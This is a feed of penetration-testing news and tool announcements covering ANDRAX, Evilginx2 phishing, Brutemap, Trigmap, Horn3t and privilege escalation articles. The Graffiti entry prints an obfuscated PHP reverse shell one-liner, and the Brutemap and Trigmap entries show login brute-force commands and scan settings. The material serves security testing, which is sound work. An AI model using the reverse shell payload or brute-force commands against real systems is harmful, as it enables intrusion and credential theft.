Linux for Pentester: Wget Privilege Escalation

In this article, we describe the full utility of the Wget command and how vital it is in Linux penetration testing. Since Wget is used for downloading files from a server, here we will learn what else this command can do in privilege escalation. Table of Content: Introduction…
The post Linux for Pentester: Wget Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/

Penetration Testing on Splunk

In this article, we are going to exploit Splunk using a reverse shell. This can be useful for exploiting and penetration testing the Splunk environment of your own IT infrastructure. Table of Content: Introduction to Splunk; Deploying Splunk on Ubuntu; Exploiting Splunk using a reverse shell. What is Splunk? Splunk Enterprise Security (ES)…
The post Penetration Testing on Splunk appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/penetration-testing-on-splunk/

Evilginx2- Advanced Phishing Attack Framework

This is the successor of Evilginx 1, and it stays in line with the MITM lineage. This tool is designed for a phishing attack to capture login credentials and a session cookie. Table of Content: Overview; Setup; Prerequisites; Installation; Domain Setup; Priming Evilginx; Execution; Lure Creation; Attack Simulation. Overview: One of the biggest concerns in today's…
The post Evilginx2- Advanced Phishing Attack Framework appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/evilginx2-advanced-phishing-attack-framework/

Linux for Pentester: APT Privilege Escalation

In this article, we talk about APT (apt-get) functionality, learn how helpful the apt command is for Linux penetration testing, and see how apt can be used to escalate to a higher-privileged shell. Table of Content: Introduction to APT (apt-get); Major operations performed using APT (apt-get); Exploiting APT (apt-get) sudo rights; Lab setups for privilege escalation…
The post Linux for Pentester: APT Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

ANDRAX v3 – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX: The first and unique penetration testing platform for Android smartphones. Thanks to Jessica Helena, who made ANDRAX v3 possible.

What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones. ANDRAX has the ability to run natively on Android, so it behaves like a common Linux distribution, but more powerful than a common distribution!

Why is Android so powerful?
Simple: everyone has a smartphone and spends all their time with it! We have the possibility to camouflage easily in the middle of everyone. The processor architecture of most Android smartphones is ARM, a modern and robust architecture extremely superior to the rest. With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android; we can get in almost anywhere with our smartphones…

In technical terms, ANDRAX and NetHunter should never be compared: ANDRAX is a penetration testing platform for Android smartphones, and NetHunter is just a Debian emulator running with chroot.

Termux is not our enemy. Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android. ANDRAX and Termux have a similar development; ANDRAX and Termux share many libs and GNU/Linux resources. But Termux is not a penetration testing platform; it's software to bring basic tools found in a Debian environment. Penetration tests are not something basic, but advanced techniques that involve advanced tools and an advanced environment to conduct good tests! So you can install many tools manually in Termux, but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing. Termux runs without root privileges, and this makes it very difficult to use advanced tools.
Features and Tools

Tool list
Information Gathering: Whois, Bind DNS tools, Dnsrecon, Raccoon, DNS-Cracker, Firewalk
Scanning: Nmap (Network Mapper), Masscan, SSLScan, Amap
Packet Crafting: Hping3, Nping, Scapy, Hexinject, Ncat, Socat
Network Hacking: ARPSpoof, Bettercap, MITMProxy, EvilGINX2
WebSite Hacking: 0d1n, Wapiti3, Recon-NG, PHPSploit, Photon, XSSer, Commix, SQLMap, Payloadmask, AbernathY-XSS
Password Hacking: Hydra, Ncrack, John The Ripper, CRUNCH
Wireless Hacking: VMP Evil AP, Aircrack-NG Tools, Cowpatty, MDK3, Reaver
Exploitation: MetaSploit Framework, RouterSploit Framework, Getsploit, OWASP ZSC, Rop-TOOL
More…

Advanced Terminal: Advanced and professional terminal emulator for hacking!
Dynamic Categories Overlay (DCO): Beautiful tools category system
Advanced IDE: Complete support for many programming languages
Information Gathering: Tools for initial information about the target
Scanning: Tools for the second stage: scanning
Packet Crafting: Tools to craft network packets
Network Hacking: Tools for network hacking
WebSite Hacking: Tools for website and web app hacking
Password Hacking: Tools to break passwords
Wireless Hacking: Tools for wireless hacking
Exploitation: Tools to develop and launch exploits

More info on the official site.
Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html

UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and greatest Kali Linux release, is now officially available! This is the second 2019 release, which comes after Kali Linux 2019.1, made available in February. This new release focuses mainly on Kali Linux NetHunter updates, including 13 new images and added device support, along with…
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkers

Graffiti is a tool to generate obfuscated one-liners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:
Python
Perl
Batch
Powershell
PHP
Bash
Graffiti will also accept a language that is not currently on the list and store the one-liner into a database.

Features
Graffiti comes complete with a database into which each encoded payload is inserted, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:
Xor
Base64
Hex
ROT13
Raw
Some features of Graffiti include:
Terminal drop-in access, with the ability to run external commands
Ability to create your own payload JSON files
Ability to view cached payloads inside of the database
Ability to run the database in memory for quick deletion
Terminal history and saving of terminal history
Auto tab completion inside of the terminal
Ability to securely wipe the history files and database file
Multiple encoding techniques as mentioned above

Usage
Graffiti comes with a built-in terminal; when you pass no flags to the program, it will drop into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. In order to get help, you just have to type help or ?:

(Graffiti ASCII-art banner) v(0.1)
no arguments have been passed, dropping into terminal
type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
root@graffiti:~/graffiti# ?
Command                         Description
---------                       --------------
help/?                          Show this help
external                        List available external commands
cached                          Display all payloads that are already in the database
list/show                       List all available payloads
search <phrase>                 Search for a specific payload
use <payload> <coder>           Use this payload and encode it using a specified coder
info <payload>                  Get information on a specified payload
check                           Check for updates
history                         Display command history
exit/quit                       Exit the terminal and running session
encode <script-type> <coder>    Encode a provided payload

The help command prints the same table.

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                   [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                   [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                   [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                   [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

optional arguments:
  -h, --help            show this help message and exit
  -c CODEC, --codec CODEC
                        specify an encoding technique (*default=None)
  -p PAYLOAD, --payload PAYLOAD
                        pass the path to a payload to use (*default=None)
  --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                        create a payload file and store it inside of ./etc/payloads (*default=None)
  -l, --list            list all available payloads by path (*default=False)
  -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                        pass your own personal payload to use for the encoding (*default=None)
  -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                        pass a listening address to use for the payload (if needed) (*default=None)
  -lP LISTENING-PORT, --lport LISTENING-PORT
                        pass a listening port to use for the payload (if needed) (*default=None)
  -u URL, --url URL     pass a URL if needed by your payload (*default=None)
  -vC, --view-cached    view the cached data already present inside of the database
  -H, --no-history      do not store the command history (*default=True)
  -W, --wipe            wipe the database and the history (*default=False)
  --memory              initialize the database into memory instead of a .db file (*default=False)
  -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                        pass more external commands, this will allow them to be accessed inside of the terminal; commands must be in your PATH (*default=None)

Encoding a payload is as simple as this:

root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
Encoded Payload:
--------------------------------------------------
php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
--------------------------------------------------

A demo of Graffiti can be found here:

Installation
On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:
./install.sh
This will install Graffiti into your system and allow you to run it from anywhere.

Bugs and issues
If you happen to find a bug or an issue, please create an issue with details here, and thank you ahead of time!
Download Graffiti

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html

Brutemap – Tool That Automates Testing Accounts To The Site’s Login Page

Brutemap is an open source penetration testing tool that automates testing accounts against a site's login page, based on a dictionary attack. With this, you no longer need to search for other bruteforce tools, and you also no longer need to ask "CMS, what is this?" only to find the form parameters, because Brutemap will do it automatically. Brutemap is also equipped with an attack method that makes it easy for you to do account checking or test forms with the SQL injection authentication bypass technique.

Installation
Brutemap uses Selenium to interact with the website, so you need to install a Web Driver for Selenium first. See here. If you have installed the git package, you only need to clone the Git repository, like this:
$ git clone https://github.com/brutemap-dev/brutemap.git
And install the required modules:
$ pip install -r requirements.txt

Usage
For basic use:
$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p default
To display a list of available options:
$ python brutemap.py -h
You can find examples of Brutemap usage here. For more information about available options, you can visit the User's manual.

Video
Links
Homepage: https://brutemap-dev.github.io
Download: .zip (latest version) or .tar.gz (latest version).
Issue tracker: https://github.com/brutemap-dev/brutemap/issues
User's manual: https://github.com/brutemap-dev/brutemap/wiki
Download Brutemap

Link: http://feedproxy.google.com/~r/PentestTools/~3/HEi_Ynm05Wg/brutemap-tool-that-automates-testing.html

Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start an Nmap scan and, especially, to collect information into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.

Details
Trigmap can perform several tasks using the Nmap Scripting Engine (NSE):
Port Scan
Service and Version Detection
Web Resources Enumeration
Vulnerability Assessment
Common Vulnerabilities Test
Common Exploits Test
Dictionary Attacks Against Active Services
Default Credentials Test

Usage
Trigmap can be used in two ways:
Interactive mode: trigmap [ENTER], and the script does the rest
NON-interactive mode: trigmap -h|--host [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]
If you want to see the help: trigmap --help to print this helper
For more screenshots see the relative directory of the repository.

Dir Hierarchy

Customization
It's possible to customize the script by changing the value of variables at the beginning of the file. In particular, you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).

################################################
# PARAMETERS
################################################
GENERAL_USER_LIST='general_user_wordlist_short.txt'
WIN_USER_LIST='win_user_wordlist_short.txt'
UNIX_USER_LIST='unix_user_wordlist_short.txt'
SHORT_PASS_LIST='fasttrack.txt'
LONG_PASS_LIST='rockyou.txt'
################################################
# NMAP SETTING
################################################
# PE (echo req), PP (timestamp-request)
# you can add a port on every ping scan
NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'
NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'
SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'
SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'
SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PASS_LIST"
CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Twin Brother
This project is very similar to Kaboom, but it has a different philosophy; in fact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is its portability and efficiency, but it's recommended to use both tools to scan the targets, so as to gather more evidence with different tools (redundancy and reliability).
Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your number one tool for exploring subdomains visually. Building on the great Sublist3r framework (or extensible with your favorite one), it searches for subdomains and generates awesome picture previews. Get a fast overview of your target with HTTP status codes, add custom found subdomains and directly access found URLs with one click.
Recon your targets at blazing speed
Enhance your productivity by focusing on interesting looking sites
Enumerate critical sites immediately
Sting your target

Installation
Install Google Chrome
Install requirements.txt with pip3
Install requirements.txt of sublist3r with pip3
Put the directory within the web server of your choice
Make sure to have the right permissions
Run horn3t.py
Or alternatively use the install.sh file with Docker.
Afterwards you can access the web portal under http://localhost:1337

Todo
Better scaling on Firefox
Add Windows Dockerfile
Direct Nmap support per click on a subdomain
Direct Dirb support per click on a subdomain
Generate PDF reports of found subdomains
Assist with subdomain takeover

Credits
aboul3la - The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of Sublist3r.
TheRook - The bruteforce module was based on his script subbrute.
bitquark - The Subbrute wordlist was based on his research dnspop.
Tested on Windows 10 and Debian with Google Chrome/Chromium 73
Download Horn3t

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html